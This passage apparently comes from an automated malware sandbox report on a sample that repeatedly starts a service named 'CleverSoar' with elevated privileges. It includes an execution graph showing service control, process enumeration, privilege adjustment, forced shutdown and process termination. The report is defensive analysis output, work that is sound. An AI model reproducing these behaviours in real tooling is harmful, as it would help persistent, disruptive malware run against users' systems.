                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:70
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:72
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:73
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:74
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:75
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:76
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:77
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:78
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:79
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:80
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:81
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:82
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:83
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:84
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:85
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:86
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:87
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:88
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:89
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:90
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:91
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:92
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:93
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:94
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:95
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:96
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:97
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:98
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:99
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:100
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:101
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:102
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:103
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:104
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:105
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:106
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:107
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:108
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:1.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:5.2%
                          Total number of Nodes:733
                          Total number of Limit Nodes:8
                          execution_graph 61646 6ca2b8f3 61647 6ca2b905 __dosmaperr 61646->61647 61648 6ca2b91d 61646->61648 61648->61647 61649 6ca2b997 61648->61649 61651 6ca2b968 __dosmaperr 61648->61651 61652 6ca2b9b0 61649->61652 61654 6ca2ba07 __wsopen_s 61649->61654 61655 6ca2b9cb __dosmaperr 61649->61655 61693 6ca1ef40 18 API calls __wsopen_s 61651->61693 61653 6ca2b9b5 61652->61653 61652->61655 61681 6ca30805 61653->61681 61687 6ca235db HeapFree GetLastError _free 61654->61687 61686 6ca1ef40 18 API calls __wsopen_s 61655->61686 61658 6ca2bb5e 61661 6ca2bbd4 61658->61661 61664 6ca2bb77 GetConsoleMode 61658->61664 61659 6ca2ba27 61688 6ca235db HeapFree GetLastError _free 61659->61688 61663 6ca2bbd8 ReadFile 61661->61663 61666 6ca2bbf2 61663->61666 61667 6ca2bc4c GetLastError 61663->61667 61664->61661 61668 6ca2bb88 61664->61668 61665 6ca2ba2e 61678 6ca2b9e2 __dosmaperr __wsopen_s 61665->61678 61689 6ca29a89 20 API calls __wsopen_s 61665->61689 61666->61667 61670 6ca2bbc9 61666->61670 61667->61678 61668->61663 61669 6ca2bb8e ReadConsoleW 61668->61669 61669->61670 61671 6ca2bbaa GetLastError 61669->61671 61674 6ca2bc17 61670->61674 61675 6ca2bc2e 61670->61675 61670->61678 61671->61678 61691 6ca2bd1e 23 API calls 3 library calls 61674->61691 61677 6ca2bc45 61675->61677 61675->61678 61692 6ca2bfd6 21 API calls __wsopen_s 61677->61692 61690 6ca235db HeapFree GetLastError _free 61678->61690 61680 6ca2bc4a 61680->61678 61682 6ca3081f 61681->61682 61683 6ca30812 61681->61683 61684 6ca3082b 61682->61684 61694 6ca1ef40 18 API calls __wsopen_s 61682->61694 61683->61658 61684->61658 61686->61678 61687->61659 61688->61665 61689->61653 61690->61647 61691->61678 61692->61680 61693->61647 61694->61683 61695 6c8af8a3 61696 6c8af887 61695->61696 61697 6c8b02ac GetCurrentProcess TerminateProcess 61696->61697 61698 6c8b02ca 61697->61698 61699 6c894b53 61857 6ca15863 61699->61857 61701 6c894b5c _Yarn 61871 6ca098b0 61701->61871 61703 6c8b639e 61965 6ca1ef50 18 API calls 2 library calls 61703->61965 61705 6c894cff 61706 6c895164 CreateFileA CloseHandle 61711 6c8951ec 61706->61711 61707 6c894bae std::ios_base::_Ios_base_dtor 61707->61703 61707->61705 61707->61706 61708 6c8a245a _Yarn _strlen 61707->61708 61708->61703 61710 6ca098b0 2 API calls 61708->61710 61728 6c8a2a83 std::ios_base::_Ios_base_dtor 61710->61728 61877 6ca13f30 OpenSCManagerA 61711->61877 61713 6c89fc00 61957 6ca14050 CreateToolhelp32Snapshot 61713->61957 61715 6ca15863 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 61720 6c895478 std::ios_base::_Ios_base_dtor _Yarn _strlen 61715->61720 61718 6c8a37d0 Sleep 61763 6c8a37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 61718->61763 61719 6ca098b0 2 API calls 61719->61720 61720->61703 61720->61713 61720->61715 61720->61719 61729 6c896722 61720->61729 61732 6c8b6ba0 104 API calls 61720->61732 61733 6c8b6e60 32 API calls 61720->61733 61745 6c896162 61720->61745 61919 6c8b7090 61720->61919 61932 6c8de010 67 API calls 61720->61932 61721 6c8b63b2 61966 6c8915e0 18 API calls std::ios_base::_Ios_base_dtor 61721->61966 61722 6ca14050 4 API calls 61723 6c8a053a 61722->61723 61730 6c8a0abc 61723->61730 61736 6ca14050 4 API calls 61723->61736 61725 6ca14050 4 API calls 61749 6c8a12e2 61725->61749 61726 6c8b64f8 61727 6c89ffe3 61727->61722 61727->61730 61728->61703 61881 6c9feff0 61728->61881 61933 6ca10900 25 API calls 4 library calls 61729->61933 61730->61708 61730->61725 61731 6c8a211c 61731->61708 61734 6c8a241a 61731->61734 61732->61720 61733->61720 61741 6c9feff0 11 API calls 61734->61741 61736->61730 61738 6ca14050 4 API calls 61753 6c8a1dd9 61738->61753 61739 6ca098b0 2 API calls 61739->61763 61742 6c8a244d 61741->61742 61963 6ca14b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 61742->61963 61744 6c8a2452 Sleep 61744->61708 61746 6c8a16ac 61748 6c89740b 61934 6ca13e00 CreateProcessA 61748->61934 61749->61731 61749->61738 61749->61746 61750 6ca14050 4 API calls 61750->61731 61753->61731 61753->61750 61754 6c8b7090 77 API calls 61754->61763 61756 6c89775a _strlen 61756->61703 61757 6c897ba9 61756->61757 61758 6c897b92 61756->61758 61761 6c897b43 _Yarn 61756->61761 61760 6ca15863 std::_Facet_Register 4 API calls 61757->61760 61759 6ca15863 std::_Facet_Register 4 API calls 61758->61759 61759->61761 61760->61761 61762 6ca098b0 2 API calls 61761->61762 61771 6c897be7 std::ios_base::_Ios_base_dtor 61762->61771 61763->61703 61763->61739 61763->61754 61890 6c8b6ba0 61763->61890 61909 6c8b6e60 61763->61909 61964 6c8de010 67 API calls 61763->61964 61764 6ca13e00 4 API calls 61775 6c898a07 61764->61775 61765 6c899d68 61768 6ca15863 std::_Facet_Register 4 API calls 61765->61768 61766 6c899d7f 61769 6ca15863 std::_Facet_Register 4 API calls 61766->61769 61767 6c89962c _strlen 61767->61703 61767->61765 61767->61766 61770 6c899d18 _Yarn 61767->61770 61768->61770 61769->61770 61772 6ca098b0 2 API calls 61770->61772 61771->61703 61771->61764 61771->61767 61773 6c898387 61771->61773 61778 6c899dbd std::ios_base::_Ios_base_dtor 61772->61778 61774 6ca13e00 4 API calls 61783 6c899120 61774->61783 61775->61774 61776 6ca13e00 4 API calls 61793 6c89a215 _strlen 61776->61793 61777 6ca13e00 4 API calls 61779 6c899624 61777->61779 61778->61703 61778->61776 61784 6c89e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 61778->61784 61938 6ca14b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 61779->61938 61780 6ca15863 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 61780->61784 61782 6ca098b0 2 API calls 61782->61784 61783->61777 61784->61703 61784->61780 61784->61782 61785 6c89f7b1 61784->61785 61786 6c89ed02 Sleep 61784->61786 61956 6ca14b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 61785->61956 61805 6c89e8c1 61786->61805 61788 6c89e8dd GetCurrentProcess TerminateProcess 61788->61784 61789 6c89a9bb 61792 6ca15863 std::_Facet_Register 4 API calls 61789->61792 61790 6c89a9a4 61791 6ca15863 std::_Facet_Register 4 API calls 61790->61791 61800 6c89a953 _Yarn _strlen 61791->61800 61792->61800 61793->61703 61793->61789 61793->61790 61793->61800 61794 6ca13e00 4 API calls 61794->61805 61795 6c89fbb8 61796 6c89fbe8 ExitWindowsEx Sleep 61795->61796 61796->61713 61797 6c89f7c0 61797->61795 61798 6c89b009 61802 6ca15863 std::_Facet_Register 4 API calls 61798->61802 61799 6c89aff0 61801 6ca15863 std::_Facet_Register 4 API calls 61799->61801 61800->61721 61800->61798 61800->61799 61803 6c89afa0 _Yarn 61800->61803 61801->61803 61802->61803 61939 6ca14780 61803->61939 61805->61784 61805->61788 61805->61794 61806 6c89b059 std::ios_base::_Ios_base_dtor _strlen 61806->61703 61807 6c89b42c 61806->61807 61808 6c89b443 61806->61808 61811 6c89b3da _Yarn _strlen 61806->61811 61809 6ca15863 std::_Facet_Register 4 API calls 61807->61809 61810 6ca15863 std::_Facet_Register 4 API calls 61808->61810 61809->61811 61810->61811 61811->61721 61812 6c89b79e 61811->61812 61813 6c89b7b7 61811->61813 61816 6c89b751 _Yarn 61811->61816 61814 6ca15863 std::_Facet_Register 4 API calls 61812->61814 61815 6ca15863 std::_Facet_Register 4 API calls 61813->61815 61814->61816 61815->61816 61817 6ca14780 104 API calls 61816->61817 61818 6c89b804 std::ios_base::_Ios_base_dtor _strlen 61817->61818 61818->61703 61819 6c89bc0f 61818->61819 61820 6c89bc26 61818->61820 61823 6c89bbbd _Yarn _strlen 61818->61823 61821 6ca15863 std::_Facet_Register 4 API calls 61819->61821 61822 6ca15863 std::_Facet_Register 4 API calls 61820->61822 61821->61823 61822->61823 61823->61721 61824 6c89c08e 61823->61824 61825 6c89c075 61823->61825 61828 6c89c028 _Yarn 61823->61828 61827 6ca15863 std::_Facet_Register 4 API calls 61824->61827 61826 6ca15863 std::_Facet_Register 4 API calls 61825->61826 61826->61828 61827->61828 61829 6ca14780 104 API calls 61828->61829 61834 6c89c0db std::ios_base::_Ios_base_dtor _strlen 61829->61834 61830 6c89c7bc 61833 6ca15863 std::_Facet_Register 4 API calls 61830->61833 61831 6c89c7a5 61832 6ca15863 std::_Facet_Register 4 API calls 61831->61832 61841 6c89c753 _Yarn _strlen 61832->61841 61833->61841 61834->61703 61834->61830 61834->61831 61834->61841 61835 6c89d3ed 61837 6ca15863 std::_Facet_Register 4 API calls 61835->61837 61836 6c89d406 61838 6ca15863 std::_Facet_Register 4 API calls 61836->61838 61839 6c89d39a _Yarn 61837->61839 61838->61839 61840 6ca14780 104 API calls 61839->61840 61842 6c89d458 std::ios_base::_Ios_base_dtor _strlen 61840->61842 61841->61721 61841->61835 61841->61836 61841->61839 61847 6c89cb2f 61841->61847 61842->61703 61843 6c89d8bb 61842->61843 61844 6c89d8a4 61842->61844 61848 6c89d852 _Yarn _strlen 61842->61848 61845 6ca15863 std::_Facet_Register 4 API calls 61843->61845 61846 6ca15863 std::_Facet_Register 4 API calls 61844->61846 61845->61848 61846->61848 61848->61721 61849 6c89dccf 61848->61849 61850 6c89dcb6 61848->61850 61853 6c89dc69 _Yarn 61848->61853 61852 6ca15863 std::_Facet_Register 4 API calls 61849->61852 61851 6ca15863 std::_Facet_Register 4 API calls 61850->61851 61851->61853 61852->61853 61854 6ca14780 104 API calls 61853->61854 61856 6c89dd1c std::ios_base::_Ios_base_dtor 61854->61856 61855 6ca13e00 4 API calls 61855->61784 61856->61703 61856->61855 61859 6ca15868 61857->61859 61858 6ca15882 61858->61701 61859->61858 61862 6ca15884 std::_Facet_Register 61859->61862 61967 6ca1de34 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 61859->61967 61861 6ca166e3 std::_Facet_Register 61971 6ca18199 RaiseException 61861->61971 61862->61861 61968 6ca18199 RaiseException 61862->61968 61864 6ca16edc IsProcessorFeaturePresent 61870 6ca16f01 61864->61870 61866 6ca166a3 61969 6ca18199 RaiseException 61866->61969 61868 6ca166c3 std::invalid_argument::invalid_argument 61970 6ca18199 RaiseException 61868->61970 61870->61701 61872 6ca098c4 61871->61872 61873 6ca098c6 FindFirstFileA 61871->61873 61872->61873 61874 6ca09900 61873->61874 61875 6ca09949 FindClose 61874->61875 61876 6ca09960 61874->61876 61875->61874 61876->61707 61878 6ca13f66 61877->61878 61879 6ca13ffb OpenServiceA 61878->61879 61880 6ca14042 61878->61880 61879->61878 61880->61720 61888 6c9ff003 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 61881->61888 61882 6ca01a40 CloseHandle 61882->61888 61883 6ca01bac CloseHandle 61883->61888 61884 6c8a37cb 61889 6ca14b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 61884->61889 61886 6ca010d2 CloseHandle 61886->61888 61887 6c9ec310 ReadFile WriteFile WriteFile WriteFile 61887->61888 61888->61882 61888->61883 61888->61884 61888->61886 61888->61887 61972 6c9eb750 61888->61972 61889->61718 61891 6c8b6bd5 61890->61891 61983 6c8e2020 61891->61983 61893 6c8b6c68 61894 6ca15863 std::_Facet_Register 4 API calls 61893->61894 61895 6c8b6ca0 61894->61895 62000 6ca16147 61895->62000 61897 6c8b6cb4 62012 6c8e1d90 61897->62012 61900 6c8b6d8e 61900->61763 61902 6c8b6dc8 62020 6c8e26e0 24 API calls 4 library calls 61902->62020 61904 6c8b6dda 62021 6ca18199 RaiseException 61904->62021 61906 6c8b6def 62022 6c8de010 67 API calls 61906->62022 61908 6c8b6e0f 61908->61763 61910 6c8b6e9f 61909->61910 61913 6c8b6eb3 61910->61913 62413 6c8e3560 32 API calls std::_Xinvalid_argument 61910->62413 61916 6c8b6f5b 61913->61916 62415 6c8e2250 30 API calls 61913->62415 62416 6c8e26e0 24 API calls 4 library calls 61913->62416 62417 6ca18199 RaiseException 61913->62417 61915 6c8b6f6e 61915->61763 61916->61915 62414 6c8e37e0 32 API calls std::_Xinvalid_argument 61916->62414 61920 6c8b709e 61919->61920 61923 6c8b70d1 61919->61923 62418 6c8e01f0 61920->62418 61922 6c8b7183 61922->61720 61923->61922 62422 6c8e2250 30 API calls 61923->62422 61926 6ca1f938 67 API calls 61926->61923 61927 6c8b71ae 62423 6c8e2340 24 API calls 61927->62423 61929 6c8b71be 62424 6ca18199 RaiseException 61929->62424 61931 6c8b71c9 61932->61720 61933->61748 61935 6ca13e90 61934->61935 61936 6ca13ed0 WaitForSingleObject CloseHandle CloseHandle 61935->61936 61937 6ca13ec4 61935->61937 61936->61935 61937->61756 61938->61767 61940 6ca147d7 61939->61940 62470 6ca14e10 61940->62470 61942 6ca147e8 61943 6c8b6ba0 104 API calls 61942->61943 61947 6ca1480c 61943->61947 61945 6ca148bf std::ios_base::_Ios_base_dtor 62523 6c8de010 67 API calls 